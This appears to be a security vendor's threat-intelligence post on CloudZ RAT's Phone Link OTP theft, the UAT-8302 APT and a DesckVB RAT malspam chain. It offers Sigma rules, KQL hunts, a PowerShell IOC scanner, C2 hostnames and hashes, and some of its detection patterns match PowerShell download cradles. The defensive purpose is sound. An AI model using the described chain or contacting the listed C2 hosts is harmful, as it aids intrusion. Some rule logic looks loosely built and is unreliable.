Threat Summary
Current OTX pulses indicate a convergence of sophisticated criminal and state-sponsored threats targeting enterprise credentials and infrastructure. The primary concerns include the active deployment of CloudZ RAT equipped with the "Pheno" plugin, which hijacks the Microsoft Phone Link application to intercept SMS OTPs without infecting the mobile device directly. Simultaneously, the UAT-8302 threat actor (China-nexus) is actively exploiting critical vulnerabilities (CVE-2025-0994, CVE-2025-20333, CVE-2025-20362) to deliver bespoke malware families like NetDraft and CloudSorcerer v3 against government and telecom sectors. Lastly, a widespread DesckVB RAT campaign is utilizing dynamic malspam with personalized lures and Google DoubleClick redirection to deliver in-memory payloads, bypassing traditional signature-based detection.
Threat Actor / Malware Profile
UAT-8302 (APT)
- Profile: China-nexus APT group targeting government, telecommunications, and technology sectors in South America and Southeastern Europe.
- Tooling: Deploys a diverse "box" of malware including NetDraft (a .NET variant of FinalDraft), CloudSorcerer v3, SNOWRUST, and DeedRAT.
- Behavior: Focuses on extensive reconnaissance and credential harvesting. Leverages zero-day and n-day CVEs for initial access.
CloudZ RAT & Pheno Plugin
- Distribution: Undocumented, likely via phishing or trojanized utilities.
- Behavior: CloudZ acts as the primary RAT, while the Pheno plugin specifically targets the Microsoft Phone Link app data (stored locally on the PC) to steal synchronized SMS messages and OTPs.
- Evasion: Uses dynamic memory allocation to evade detection and operates by reading synced mobile data rather than attacking the phone directly.
DesckVB RAT
- Distribution: Sophisticated malspam campaign utilizing "dynamic delivery kits" that insert victim email addresses and company logos into lure documents in real-time.
- Behavior: Routes traffic through Google's DoubleClick to bypass email gateways. Uses a 5-stage infection chain: HTML Redirect → JScript Loader → PowerShell Dropper → VenomRAT/DesckVB.
- Evasion: Heavy reliance on in-memory execution and AMSI bypass techniques.
IOC Analysis
The provided indicators suggest a multi-vector threat landscape:
- File Hashes: A significant volume of SHA256, MD5, and SHA1 hashes are associated with the payloads. These should be blocklisted on endpoints and used for retroactive hunts in EDR telemetry.
- CVEs: CVE-2025-0994, CVE-2025-20333, and CVE-2025-20362 are critical for vulnerability management and patching immediately.
- Network Indicators: Hostnames such as
xtadts.ddns.netandafxwd.ddns.netindicate the use of DDNS for C2 infrastructure. These should be blocked at the perimeter and via DNS filtering.
Detection Engineering
YAML
title: CloudZ Pheno Plugin - Microsoft Phone Link Data Access
id: 649a8f2a-1b0c-4c3d-8e5f-9a2b3c4d5e6f
description: Detects suspicious access to Microsoft Phone Link synchronized data directories, indicative of CloudZ Pheno plugin behavior intercepting SMS/OTP.
status: experimental
date: 2026/06/06
author: Security Arsenal
references:
- https://blog.talosintelligence.com/cloudz-pheno-infostealer/
tags:
- attack.credential_access
- attack.t1119
logsource:
category: file_access
product: windows
detection:
selection:
TargetFilename|contains: '\AppData\Local\Packages\Microsoft.CrossDevice_'
filter_legit:
Image|endswith:
- '\PhoneLink.exe'
- '\explorer.exe'
condition: selection and not filter_legit
falsepositives:
- Legitimate backup tools accessing PhoneLink data
level: high
---
title: DesckVB RAT - Dynamic Malspam Infection Chain
id: 7a5b9c3d-2e1f-4a5b-8c6d-0e1f2a3b4c5d
description: Detects the DesckVB RAT infection chain involving JScript loaders invoking PowerShell with encoded commands, often following redirection from ad networks.
status: experimental
date: 2026/06/06
author: Security Arsenal
references:
- https://www.huntress.com/blog/malspam-to-deskcvb-rat-delivery-chain-analysis
tags:
- attack.execution
- attack.t1059.001
- attack.t1204.002
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\wscript.exe'
- '\cscript.exe'
selection_child:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'EncodedCommand'
- 'NoProfile'
selection_context:
CommandLine|contains:
- 'doubleclick.net'
- 'DownloadString'
condition: all of selection_*
falsepositives:
- Administrative scripting using encoded commands
level: critical
---
title: UAT-8302 Activity - Exploitation of CVE-2025-0994
id: 8b6c0d4e-3f2a-5b6c-9d7e-1f2a3b4c5d6e
description: Detects potential exploitation of CVE-2025-0994 associated with UAT-8302 activity involving memory corruption or specific service manipulation.
status: experimental
date: 2026/06/06
author: Security Arsenal
references:
- https://blog.talosintelligence.com/uat-8302/
tags:
- attack.initial_access
- attack.t1068
logsource:
category: vulnerability
product: windows
detection:
selection:
CVE|contains: 'CVE-2025-0994'
condition: selection
falsepositives:
- Vulnerability scanner activity
level: high
kql
// Hunt for DesckVB RAT C2 Hostnames and related Network Activity
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("xtadts.ddns.net", "afxwd.ddns.net", "catalogo.castrouria.com", "fostercareintheus.optimizationprime.com")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend FullUrl = strcat("Protocol://", RemoteUrl, "/", RemotePort)
| order by Timestamp desc
;
// Hunt for CloudZ and UAT-8302 File Hashes
DeviceProcessEvents
| where Timestamp > ago(30d)
| where SHA256 in (
"5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321",
"fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00",
"c356aff1a01c2b0da472e584c8e3c8f875b9a24280435d42836a77b19f5a8c18"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, AccountName, InitiatingProcessParentFileName
| order by Timestamp desc
powershell
<#
.SYNOPSIS
IOC Hunt Script for CloudZ, DesckVB, and UAT-8302 Malware
.DESCRIPTION
Scans the system for specific file hashes, registry anomalies associated with Microsoft Phone Link abuse,
and checks the hosts file for DesckVB RAT C2 indicators.
#>
$MalwareHashes = @(
"5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321",
"a39299719bb4151c373a0e9b92b2bd05",
"fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00",
"c356aff1a01c2b0da472e584c8e3c8f875b9a24280435d42836a77b19f5a8c18"
)
$C2Hosts = @(
"xtadts.ddns.net",
"afxwd.ddns.net",
"catalogo.castrouria.com",
"fostercareintheus.optimizationprime.com"
)
Write-Host "[+] Starting IOC Hunt..." -ForegroundColor Cyan
# 1. Check Hosts File for C2 Indicators
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
Write-Host "[+] Checking $HostsPath for C2 hostnames..." -ForegroundColor Yellow
if (Test-Path $HostsPath) {
$HostsContent = Get-Content $HostsPath
foreach ($Host in $C2Hosts) {
if ($HostsContent -match $Host) {
Write-Host "[!] ALERT: C2 Hostname found in hosts file: $Host" -ForegroundColor Red
}
}
}
# 2. Scan Download and Temp Folders for Suspicious Hashes
Write-Host "[+] Scanning user temp directories for known malware hashes..." -ForegroundColor Yellow
$PathsToScan = @("$env:TEMP", "$env:USERPROFILE\Downloads", "C:\Windows\Temp")
foreach ($Path in $PathsToScan) {
if (Test-Path $Path) {
Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
$FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash.ToLower()
if ($MalwareHashes -contains $FileHash) {
Write-Host "[!] ALERT: Malware file found: $($_.FullName) | Hash: $FileHash" -ForegroundColor Red
}
}
}
}
# 3. Check for suspicious Phone Link activity (Recent file access)
Write-Host "[+] Checking for unusual access to Phone Link data..." -ForegroundColor Yellow
$PhoneLinkPath = "$env:LOCALAPPDATA\Packages\Microsoft.CrossDevice_"
if (Test-Path $PhoneLinkPath) {
# In a real environment, checking USN journal or access logs is preferred. Here we check for unexpected binaries in the tree.
Get-ChildItem -Path $PhoneLinkPath -Recurse -Include *.exe, *.dll -ErrorAction SilentlyContinue | ForEach-Object {
if (-not ($_.VersionInfo.OriginalFilename -match "Microsoft")) {
Write-Host "[!] Suspicious binary found in Phone Link directory: $($_.FullName)" -ForegroundColor Red
}
}
}
Write-Host "[+] Hunt Complete." -ForegroundColor Green
Response Priorities
Immediate
- Block IOCs: Implement immediate blocklists for the SHA256 hashes and DDNS hostnames provided in the pulses on firewalls, EDRs, and Secure Web Gateways.
- Patch Management: Prioritize patching for CVE-2025-0994, CVE-2025-20333, and CVE-2025-20362 across all government and telecom-facing assets.
24h
- Identity Audit: Given the CloudZ Pheno plugin's capability to steal OTPs and credentials, force a password reset and MFA re-enrollment for accounts associated with devices where suspicious activity (Phone Link abuse) is detected.
- Email Filtering: Update secure email gateways to block dynamic delivery kits and filter HTML attachments that utilize DoubleClick redirection.
1 Week
- Architecture Review: Evaluate the necessity of Microsoft Phone Link in the enterprise environment. If not required, restrict or uninstall it to mitigate the CloudZ attack vector.
- Harden Scripting: Enforce strict AMSI (Antimalware Scan Interface) logging and blocking for PowerShell to hinder DesckVB's in-memory execution techniques.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-malwarecloudz-ratuat-8302desckvb-ratmalspamapt
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.